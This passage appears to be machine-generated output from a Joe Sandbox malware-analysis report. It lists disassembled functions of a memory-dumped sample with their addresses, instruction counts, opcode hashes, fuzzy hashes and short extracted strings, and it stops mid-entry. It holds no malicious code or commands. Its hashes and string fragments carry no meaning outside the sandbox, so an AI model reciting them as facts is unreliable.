                      • Instruction ID: aec24f6fa87e507cd08018ed672e7fcc1d34e5a13bfb062182e80eee3b161e8e
                      • Opcode Fuzzy Hash: 4f4a1fc254a46c50fdb82f8541195ef5e7f55d78da9f8c00265a6fdffac978a1
                      • Instruction Fuzzy Hash: 42B13A23F0E6854FD795ABA898B72FA3FE0EF43325B1901FBD148C6097D93894069381
                      Function 00007FFD3449524D Relevance: 3.2, Strings: 2, Instructions: 689COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8m64$pGR4
                      • API String ID: 0-4022628259
                      • Opcode ID: 6b7e4e97ad19002fddf989d7e4552e5fd75697d86d58b94248e4f1432e24e8f2
                      • Instruction ID: 716ac3daa091287b705313a941d34bb4bc04491367c8fbd9c2206cd9cac668ee
                      • Opcode Fuzzy Hash: 6b7e4e97ad19002fddf989d7e4552e5fd75697d86d58b94248e4f1432e24e8f2
                      • Instruction Fuzzy Hash: 0732AF31E0864E8FEB94EB6888A96BD7BF0FF1A300F1105BAD509D3196DE79A444DB41
                      Function 00007FFD344A2818 Relevance: 1.3, Instructions: 1291COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ccce0deafd18c21345692991f19e578314e97baa3425b7fd8d5ebb4abe2910e2
                      • Instruction ID: 07c7969905fea443c73327c803e762361b8eae68bbe32de452f4708a9acff893
                      • Opcode Fuzzy Hash: ccce0deafd18c21345692991f19e578314e97baa3425b7fd8d5ebb4abe2910e2
                      • Instruction Fuzzy Hash: E1A2BE30E0864D8FDB95EF6888A96F97BF0FF19300F0105BAD559D3196DEB9A944CB40
                      Function 00007FFD344947C0 Relevance: .8, Instructions: 849COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5711978e0d10eb000602b50969e3dd1dd1aba4809dc7c1b58ecfa6d97ce9d141
                      • Instruction ID: 370818b7e57d287a8afef92be9f3604cd741d98eb2e5b450276830a411058e35
                      • Opcode Fuzzy Hash: 5711978e0d10eb000602b50969e3dd1dd1aba4809dc7c1b58ecfa6d97ce9d141
                      • Instruction Fuzzy Hash: 2A62DF31A0E68A8FEB959F7488692F97FE0FF06304F0505BED948C6092DA7CA554E742
                      Function 00007FFD34494929 Relevance: .7, Instructions: 711COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a2cd54ef2564813a3806a675acda0e009ac9709edd40c6fc144d2c2747ae9b0b
                      • Instruction ID: 1cb406d833abf23f12cf0d82c74360f7422e7b6d969caf1199205aad86aeb6f9
                      • Opcode Fuzzy Hash: a2cd54ef2564813a3806a675acda0e009ac9709edd40c6fc144d2c2747ae9b0b
                      • Instruction Fuzzy Hash: 3542E131E0E68A8FEB95DF7488692F97BE0FF06304F0505BED948C6092DA7CA554E742
                      Function 00007FFD344A90B2 Relevance: .5, Instructions: 457COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 349c3f6962456f0a35d6344f869a202ca4e239ec616b3e48db1fc1e6e6b962fa
                      • Instruction ID: fc2e3c44c1707b4fc8639dc284b6cbf3599fb590d1da2dd0ab9887d4063fc30c
                      • Opcode Fuzzy Hash: 349c3f6962456f0a35d6344f869a202ca4e239ec616b3e48db1fc1e6e6b962fa
                      • Instruction Fuzzy Hash: 06E1A330A09A4D8FEBA8DF28C8957E977E1FB59310F04467ED84DC7295CE78E9448B81
                      Function 00007FFD34494CA9 Relevance: .4, Instructions: 437COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 121e5ddd0692024eb400503598f0e221ef5d03b326c312aabd28c369499f5ea8
                      • Instruction ID: d6372c8c3003935897e33ff11fcda888429f56c6d16f02bcec25608293e4a82d
                      • Opcode Fuzzy Hash: 121e5ddd0692024eb400503598f0e221ef5d03b326c312aabd28c369499f5ea8
                      • Instruction Fuzzy Hash: 1BE11531E0E68A8FEB959F3488692F97BE0FF06304F0505BFD948C2092DA7CA554E742
                      Function 00007FFD3449C08B Relevance: .4, Instructions: 365COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6fc8f09a487b398852e5ac8ae1c1da4d32f05df5e43ed502fb0bb2da60e17679
                      • Instruction ID: 2cd8590f814ba3a61fb02d9a8e0a8e86a604269b1379f4a9904c8977b630c8a0
                      • Opcode Fuzzy Hash: 6fc8f09a487b398852e5ac8ae1c1da4d32f05df5e43ed502fb0bb2da60e17679
                      • Instruction Fuzzy Hash: 04D12530A0C78A9FE752EB7884A61E97FF0FF07310F0545BAC109D60BADA39A559DB41
                      Function 00007FFD3449B725 Relevance: .3, Instructions: 313COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f9e28991d3e935f011d2da6f18f84bc3b9f303991659c22462c5c8e083b4698e
                      • Instruction ID: dbd9f823e0bef10d0f4cc5096fbe6db4544b5cc4c2f8f9a40f3ce02bd8733e9a
                      • Opcode Fuzzy Hash: f9e28991d3e935f011d2da6f18f84bc3b9f303991659c22462c5c8e083b4698e
                      • Instruction Fuzzy Hash: B0B1E030E1D68A8FEB51EB6488A92FE3BF0FF0A310F0145BAD509D7196DE78A544E741
                      Function 00007FFD34492770 Relevance: .3, Instructions: 309COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 246b6b9003fb996980b804706781ecc4c3f7da5727e735c8d7795319c597df17
                      • Instruction ID: 7d9d78966c4173e16b6675c2bcaf17ae03442b0ef8a049098e32323071558d84
                      • Opcode Fuzzy Hash: 246b6b9003fb996980b804706781ecc4c3f7da5727e735c8d7795319c597df17
                      • Instruction Fuzzy Hash: A1B1EF30A0C68A8FDB95DF24C8A95FA3BF0FF0A300F0209BED509C7196DA79A544D781
                      Function 00007FFD344971BD Relevance: .3, Instructions: 299COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 75ce3ee99d2d146a44c68ce69a1050d489d6a1c2a082156ef19961086ce41493
                      • Instruction ID: 263780c5659d597bfc62a6cd17273fa77f1f632ba33ce07b14b7615e35540915
                      • Opcode Fuzzy Hash: 75ce3ee99d2d146a44c68ce69a1050d489d6a1c2a082156ef19961086ce41493
                      • Instruction Fuzzy Hash: 70A1E030A0D68A8FEB9ADF6488AA2B97FE0FF16300F0501BFD549C7193CA796545E741
                      Function 00007FFD3449FF90 Relevance: .3, Instructions: 284COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0beacc5ea703308782b538a40140adb0d6de18d9906eff57a76435ff50171dc8
                      • Instruction ID: a607bd6122288925caceda5cdcc51aa01af8d1d7a0df2d31c25e89c37e2e6fbb
                      • Opcode Fuzzy Hash: 0beacc5ea703308782b538a40140adb0d6de18d9906eff57a76435ff50171dc8
                      • Instruction Fuzzy Hash: 39A17C30A0964D8FEB95EF64C8A96FE7BF0FF1A300F0105BAD409D3196DA79A944DB41
                      Function 00007FFD344A28B0 Relevance: .3, Instructions: 277COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c742d20d6774f4b727329715c8d1e958ad6a93b2be72b427ec8dbc8c9ffd5cca
                      • Instruction ID: 8c227f0fca38dd6d3737383856ee5702e70957cf95d862fc9c209afbece55a07
                      • Opcode Fuzzy Hash: c742d20d6774f4b727329715c8d1e958ad6a93b2be72b427ec8dbc8c9ffd5cca
                      • Instruction Fuzzy Hash: 6EA1A230A0E6898FDB96DF2488A91B97BF0FF16300F0509BFD51AC6192DB79E544DB01
                      Function 00007FFD344980AD Relevance: .2, Instructions: 246COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6d6a6024de6d48b749553212728c8dac268cb12fea53cee0360ec6fc7e3c1ad4
                      • Instruction ID: 0fc9b41205f815c3a465662407af00957da9b9565e50d587d1b69f7c633549a7
                      • Opcode Fuzzy Hash: 6d6a6024de6d48b749553212728c8dac268cb12fea53cee0360ec6fc7e3c1ad4
                      • Instruction Fuzzy Hash: 2081F230A1864A8FEB99EF28C8A96FE7BF0FF16300F1105BED409C7096DAB96545D741
                      Function 00007FFD344911F1 Relevance: .2, Instructions: 243COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2e91e26eb41688e28149c595f90271fee484a4db4f7532562c31e17eee377d5
                      • Instruction ID: 27f013f6a1e65db554a50848ee453f37b8d9de6b00ccd6ece6a0643113d9b48c
                      • Opcode Fuzzy Hash: b2e91e26eb41688e28149c595f90271fee484a4db4f7532562c31e17eee377d5
                      • Instruction Fuzzy Hash: E581AE30A0864E8FEB99EF24C8A92B97BF1FF1A300F0105BAD41AD7196DB79A544D741
                      Function 00007FFD34499088 Relevance: .2, Instructions: 238COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 631b36580adaa2fb196b882c566d1c929834390217dc3a867731224d203f9868
                      • Instruction ID: d318da8d5736a2255d0c52f5b67c98cf680a6da5e7092aaeeea91adea5394ef1
                      • Opcode Fuzzy Hash: 631b36580adaa2fb196b882c566d1c929834390217dc3a867731224d203f9868
                      • Instruction Fuzzy Hash: 0B715B32B0D6594FDB05AFF8E8622EE77A0EF42325F0401BBD548E7193DA296458CBD1
                      Function 00007FFD344B5508 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: VK4$mX4
                      • API String ID: 0-3068645033
                      • Opcode ID: 00d99a3b11e4f71ddb201b53cd9a3bedab350a6da97e1d938a36308261895424
                      • Instruction ID: 0039b00e8150a013612ccbdceae87a67b5d0a8536a55844825df2bcd3ce195e8
                      • Opcode Fuzzy Hash: 00d99a3b11e4f71ddb201b53cd9a3bedab350a6da97e1d938a36308261895424
                      • Instruction Fuzzy Hash: 75A12931B0CA494BEF58DE1888A15B977D2EF9A314F15417EE59DC3296CEB8E802C742
                      Function 00007FFD3449ACB5 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: py64$wL_H
                      • API String ID: 0-266364271
                      • Opcode ID: 62c3b623ba01a1a77874c2db4f7c42013fb71ecf4c71310175812f551d979458
                      • Instruction ID: 029e4d5a283501afc50227aa2820349289d01b71da4128a39d782a5f6929cd7c
                      • Opcode Fuzzy Hash: 62c3b623ba01a1a77874c2db4f7c42013fb71ecf4c71310175812f551d979458
                      • Instruction Fuzzy Hash: E1814231A4D68D4FDB56EB68D8A16FA7BB0EF47314F0901BBD009EB092CA696846C741
                      Function 00007FFD344A46C7 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: Kq$[p
                      • API String ID: 0-2417018325
                      • Opcode ID: 25447b5ea3c081ef7f4a59b77cc2a95ad7501763837ce062fe431c710f885794
                      • Instruction ID: b3442445b1ed65e61c0dc1ee3db7a094bab9e430f8355c53cedb834f57d21644
                      • Opcode Fuzzy Hash: 25447b5ea3c081ef7f4a59b77cc2a95ad7501763837ce062fe431c710f885794
                      • Instruction Fuzzy Hash: 3B61F634E0991D8FEB94EB58E8A47ACB7B1FF59300F5101B9D10DE3295DB786984DB01
                      Function 00007FFD344984AB Relevance: 2.6, Strings: 2, Instructions: 74COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: @q64$@q64
                      • API String ID: 0-1593304362
                      • Opcode ID: 17ae6044d28754e494479d16f2c7d8fc155ecfca7dbc4679ce494437009d3e15
                      • Instruction ID: e9ba35244e1a95ec050ab876243a1018dd6e80380bbdff092726a4f524e1b9c7
                      • Opcode Fuzzy Hash: 17ae6044d28754e494479d16f2c7d8fc155ecfca7dbc4679ce494437009d3e15
                      • Instruction Fuzzy Hash: C021CF71F1850E8BEB68AB58C8A21FD77A5EF56311F55017FC00AD72D6DE6C28029B40
                      Function 00007FFD344B324F Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: a$f
                      • API String ID: 0-3815595470
                      • Opcode ID: 980ae0c3f2374af0033c59ae2b55e832b43528da2ed3e619f3ecfd43d847fa41
                      • Instruction ID: c87b8b91d117a6e71080b14ed3fa7899b6a9441a5f532642830fbf59d9ce84dd
                      • Opcode Fuzzy Hash: 980ae0c3f2374af0033c59ae2b55e832b43528da2ed3e619f3ecfd43d847fa41
                      • Instruction Fuzzy Hash: A531D870D0562A8FFBA8DB05C898BACB3B1BB55301F5141FAD44DE6295CBB92E84DF40
                      Function 00007FFD3449C6A0 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: ZL_H
                      • API String ID: 0-3109080135
                      • Opcode ID: f0b75f4e6fa2ddaf0e55c03104ae784f9db339a6dd99c86b1c739b52ac951102
                      • Instruction ID: 0403c6e5b4c95b0050f5b2a1c6a7a6df3ac8fbe385b702c942a1d82e9961b7e9
                      • Opcode Fuzzy Hash: f0b75f4e6fa2ddaf0e55c03104ae784f9db339a6dd99c86b1c739b52ac951102
                      • Instruction Fuzzy Hash: 9DD15E30E4861D8FEB50EBA4C8A97ADB7B1FF4A300F0141BAD10DE7296DE786944DB41
                      Function 00007FFD344AB1E8 Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: |V4
                      • API String ID: 0-3152125477
                      • Opcode ID: 92fce17854a254f5ff5fa59d3a53d472b91275e2bd8d9a9837b78e2544e41ef5
                      • Instruction ID: 35b14acbcc18bb2a3a353fef9be64b322c73ea80760594e1328b7463cbd0bbf9
                      • Opcode Fuzzy Hash: 92fce17854a254f5ff5fa59d3a53d472b91275e2bd8d9a9837b78e2544e41ef5
                      • Instruction Fuzzy Hash: DB81F671B09D0D4FEFD8DA5C94A96B973E1FFA9304F11417AE00ED7296DD64AC428780
                      Function 00007FFD34481618 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2EQ4
                      • API String ID: 0-2401450173
                      • Opcode ID: 5318d53b90a6b42a10a017b46ef588f742206d0a3c466d1b0445c2290bda3ffb
                      • Instruction ID: 7039b2015f3cc63c7a0df90196c78e09dfacd843e967b81e81509f6a40137950
                      • Opcode Fuzzy Hash: 5318d53b90a6b42a10a017b46ef588f742206d0a3c466d1b0445c2290bda3ffb
                      • Instruction Fuzzy Hash: 4181B431B0CA494BEB99DE1C88A55B977E2EF99304F15017FE58ED3286CE75EC028781
                      Function 00007FFD3449C709 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: ZL_H
                      • API String ID: 0-3109080135
                      • Opcode ID: 41ece30a56d74725d1c6985440979233defbc9b24ae58d83608d16682f3f861c
                      • Instruction ID: e965c88d22c6bde9ff8f0e0e6303e85b67452e63b909f27aa42645f6c1182991
                      • Opcode Fuzzy Hash: 41ece30a56d74725d1c6985440979233defbc9b24ae58d83608d16682f3f861c
                      • Instruction Fuzzy Hash: 8CB14A70E5861E8FEB50EBA4C8A57ADB7B1FF4A300F0041B9D10DE7282DE786945DB41
                      Function 00007FFD34497E40 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: OQ_H
                      • API String ID: 0-3395902409
                      • Opcode ID: ecd1915b99d2cc74df3c0bbbcedef7ba0334e7811326ba08b81a245c0549e40a
                      • Instruction ID: 91bfebdf4e8695a27f45bac4361e31a3a889dfc5d1ebf16bd61eb413ab7e41db
                      • Opcode Fuzzy Hash: ecd1915b99d2cc74df3c0bbbcedef7ba0334e7811326ba08b81a245c0549e40a
                      • Instruction Fuzzy Hash: 9B91DD30A0C68E8FDB86EF64C8686F97BF0FF0A310F0504BAD409E7196DA79A845D751
                      Function 00007FFD3449B46B Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2EQ4
                      • API String ID: 0-2401450173
                      • Opcode ID: 717f6ca47952094334d42da77122647bfc7a8e16b2c518a63e131e53f9dd0378
                      • Instruction ID: 6449e130f95040ca5f75a8fcc65399d619a9094f56513b1edd1c42a1ffad9081
                      • Opcode Fuzzy Hash: 717f6ca47952094334d42da77122647bfc7a8e16b2c518a63e131e53f9dd0378
                      • Instruction Fuzzy Hash: 76818271E0895D8FEBA4EB58C8A5AE9B3B1FF59310F0101B6D11DE7296CD38A9819B40
                      Function 00007FFD344ACDA9 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: |V4
                      • API String ID: 0-3152125477
                      • Opcode ID: 19af77b1b9f66c0fa3fd9a2069aae358f2ef9debe1c2db9eb62b0815cae7ed4a
                      • Instruction ID: 7a316fa528b3ad780ff963c07b6c09783b607fd616e1a4a8f5acfeda396b73e9
                      • Opcode Fuzzy Hash: 19af77b1b9f66c0fa3fd9a2069aae358f2ef9debe1c2db9eb62b0815cae7ed4a
                      • Instruction Fuzzy Hash: F1712631A0DA0C8FEFD4DB6CC495AA977E1EF66304F11417AD409D7296DE64EC42CB80
                      Function 00007FFD3449B14F Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: sL_H
                      • API String ID: 0-1684679923
                      • Opcode ID: 1ad04b6ab13c3f0b7521a9ea615f7b1525ecc8ec4da0cf7a5f7c41b97266447d
                      • Instruction ID: 873586a4e53a4efd35b1302eabce18b72974de2e945dbdc35c708db564ed63f5
                      • Opcode Fuzzy Hash: 1ad04b6ab13c3f0b7521a9ea615f7b1525ecc8ec4da0cf7a5f7c41b97266447d
                      • Instruction Fuzzy Hash: FA91E771E1491D8EEBA4EB68C4A57E8B7B1FF59300F5000FAD50DE3296DE796A81DB00
                      Function 00007FFD344AB0C0 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8uV4
                      • API String ID: 0-2343873422
                      • Opcode ID: 9d78fffa70d0917a89125c47ad5d617b4afd77fe064ca5c92ba3996fd8f76814
                      • Instruction ID: 4830e392fdee272819211bc089c64d554ba9cb4338ff6e1c1ee29c9cdfedd507
                      • Opcode Fuzzy Hash: 9d78fffa70d0917a89125c47ad5d617b4afd77fe064ca5c92ba3996fd8f76814
                      • Instruction Fuzzy Hash: 21512762B1DD4A1FF7E8DA1C54A927677D1FFAA35071542BBD00EC329AED5DE8024380
                      Function 00007FFD344ACC85 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8uV4
                      • API String ID: 0-2343873422
                      • Opcode ID: 4d13bc30364215f29f148e544deb1509d2affbb4392be027de233a12dd6bb2f3
                      • Instruction ID: a0c099e1dc2e122db89e67429ca84ef1c50d4536a14f01183f65231820c7145f
                      • Opcode Fuzzy Hash: 4d13bc30364215f29f148e544deb1509d2affbb4392be027de233a12dd6bb2f3
                      • Instruction Fuzzy Hash: 3B312562B0DD590FE7E8EA2C946926A67D2FFEA25430042BBD04DC729ADD08A8024381
                      Function 00007FFD344AC954 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0nV4
                      • API String ID: 0-1584648176
                      • Opcode ID: 0dac7e7dea953b14a2e18b2298d9f96c83bb64ed726ae9fc8f638185e4b40adb
                      • Instruction ID: ace69c9c66ea6ca52d2e404fa554573cca09403c2411c3d9995cd63a3fc523e4
                      • Opcode Fuzzy Hash: 0dac7e7dea953b14a2e18b2298d9f96c83bb64ed726ae9fc8f638185e4b40adb
                      • Instruction Fuzzy Hash: 4C31042164EBCA0FDBD6CB6818752B63FE0EF57220B0A41FBD449D71A7D95C9C068391
                      Function 00007FFD344A308F Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
